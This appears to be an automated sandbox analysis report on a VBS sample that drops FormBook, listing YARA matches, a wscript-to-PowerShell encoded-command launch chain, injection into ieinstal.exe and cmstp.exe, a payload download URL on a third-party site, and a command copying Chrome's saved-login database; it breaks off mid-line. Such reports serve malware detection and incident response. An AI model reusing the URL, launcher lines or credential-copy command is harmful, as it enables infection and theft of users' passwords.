Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmp | String found in binary or memory: https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.bin
Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmp | String found in binary or memory: https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.binhttp://fahrschule-heli.at
Source: unknown | DNS traffic detected: queries for: www.wizumiya.co.jp

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY

      System Summary:

      barindex
      Detected FormBook malwareShow sources
      Source: C:\Windows\SysWOW64\cmstp.exeDropped file: C:\Users\user\AppData\Roaming\O118090C\O11logri.iniJump to dropped file
      Source: C:\Windows\SysWOW64\cmstp.exeDropped file: C:\Users\user\AppData\Roaming\O118090C\O11logrv.iniJump to dropped file
      Malicious sample detected (through community Yara rule)Show sources
      Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Wscript starts Powershell (via cmd or directly)Show sources
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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 to behavior
      Potential malicious VBS script found (suspicious strings)Show sources
      Source: Initial file: obj1.ShellExecute MyFile , " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
      Source: Initial file: obj1.ShellExecute "powershell.exe", " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
      Very long command line foundShow sources
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7149
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7149Jump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
      Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00D1CDF8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00D1DED8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_07617E00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1EDD2EF7
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1EDCD616
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED26E30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1EDD1FF1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1EDCD466
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED1841F
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1EDD25DD
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED1D5E0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED32581
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1EDD1D55
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1EDD2D07
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED00D20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1EDD22AE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1EDCDBD2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED3EBB0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1EDD2B28
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1EDD28EC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED1B090
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED320A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1EDD20A8
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1EDC1002
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED0F900
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED24120
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_047E841F
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_0489D466
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04802581
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_048A25DD
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_047D0D20
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_048A2D07
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_047ED5E0
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_048A1D55
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_047F6E30
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_048A2EF7
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_0489D616
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_048ADFCE
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_048A1FF1
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_048020A0
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_048A20A8
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_047FA830
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_048A28EC
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04891002
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_048AE824
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_047EB090
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_047F4120
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_047DF900
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_048A22AE
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_0488FA2B
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_0480EBB0
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_047FAB40
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_048903DA
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_0489DBD2
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_048A2B28
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_00632D8F
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_00632D90
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_00639E60
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_0064DE6D
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_00639E5C
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_0064D70F
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_00632FB0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: String function: 1ED0B150 appears 35 times
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: String function: 047DB150 appears 54 times
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED496E0 NtFreeVirtualMemory,LdrInitializeThunk
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49660 NtAllocateVirtualMemory,LdrInitializeThunk
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49780 NtMapViewOfSection,LdrInitializeThunk
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED497A0 NtUnmapViewOfSection,LdrInitializeThunk
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49710 NtQueryInformationToken,LdrInitializeThunk
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49540 NtReadFile,LdrInitializeThunk
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49A50 NtCreateFile,LdrInitializeThunk
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49A00 NtProtectVirtualMemory,LdrInitializeThunk
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49A20 NtResumeThread,LdrInitializeThunk
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED498F0 NtReadVirtualMemory,LdrInitializeThunk
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49840 NtDelayExecution,LdrInitializeThunk
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49860 NtQuerySystemInformation,LdrInitializeThunk
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED499A0 NtCreateSection,LdrInitializeThunk
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49910 NtAdjustPrivilegesToken,LdrInitializeThunk
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED496D0 NtCreateKey
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49650 NtQueryValueKey
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49670 NtQueryInformationProcess
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49610 NtEnumerateValueKey
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49FE0 NtCreateMutant
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED4A770 NtOpenThread
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49770 NtSetInformationFile
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49760 NtOpenProcess
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED4A710 NtOpenProcessToken
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49730 NtQueryVirtualMemory
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED495D0 NtClose
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED495F0 NtQueryInformationFile
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49560 NtWriteFile
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED4AD30 NtSetContextThread
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49520 NtWaitForSingleObject
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49A80 NtOpenDirectoryObject
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49A10 NtQuerySection
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED4A3B0 NtGetContextThread
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49B00 NtSetValueKey
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED498A0 NtWriteVirtualMemory
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED4B040 NtSuspendThread
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49820 NtEnumerateKey
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED499D0 NtCreateProcessEx
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 18_2_1ED49950 NtQueueApcThread
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_048195D0 NtClose,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819540 NtReadFile,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819560 NtWriteFile,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_048196D0 NtCreateKey,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_048196E0 NtFreeVirtualMemory,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819610 NtEnumerateValueKey,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819650 NtQueryValueKey,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819660 NtAllocateVirtualMemory,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819780 NtMapViewOfSection,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819FE0 NtCreateMutant,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819710 NtQueryInformationToken,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819770 NtSetInformationFile,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819840 NtDelayExecution,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819860 NtQuerySystemInformation,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_048199A0 NtCreateSection,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819910 NtAdjustPrivilegesToken,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819A50 NtCreateFile,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819B00 NtSetValueKey,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_048195F0 NtQueryInformationFile
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819520 NtWaitForSingleObject
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_0481AD30 NtSetContextThread
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819670 NtQueryInformationProcess
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_048197A0 NtUnmapViewOfSection
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_0481A710 NtOpenProcessToken
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819730 NtQueryVirtualMemory
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819760 NtOpenProcess
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_0481A770 NtOpenThread
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_048198A0 NtWriteVirtualMemory
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_048198F0 NtReadVirtualMemory
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819820 NtEnumerateKey
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_0481B040 NtSuspendThread
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_048199D0 NtCreateProcessEx
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819950 NtQueueApcThread
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819A80 NtOpenDirectoryObject
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819A00 NtProtectVirtualMemory
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819A10 NtQuerySection
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_04819A20 NtResumeThread
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_0481A3B0 NtGetContextThread
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_0064A370 NtCreateFile
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_0064A420 NtReadFile
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_0064A4A0 NtClose
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_0064A550 NtAllocateVirtualMemory
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_0064A36B NtCreateFile
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_0064A41A NtReadFile
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_0064A49A NtClose
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 27_2_0064A54B NtAllocateVirtualMemory
      Source: MTIR22024323_0553381487_20220112120005.vbs | Initial sample: Strings found which are bigger than 50
      Source: MTIR22024323_0553381487_20220112120005.vbs | ReversingLabs: Detection: 12%
      Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\MTIR22024323_0553381487_20220112120005.vbs"
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
      Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
      Source: C:\Windows\SysWOW64\cmstp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: <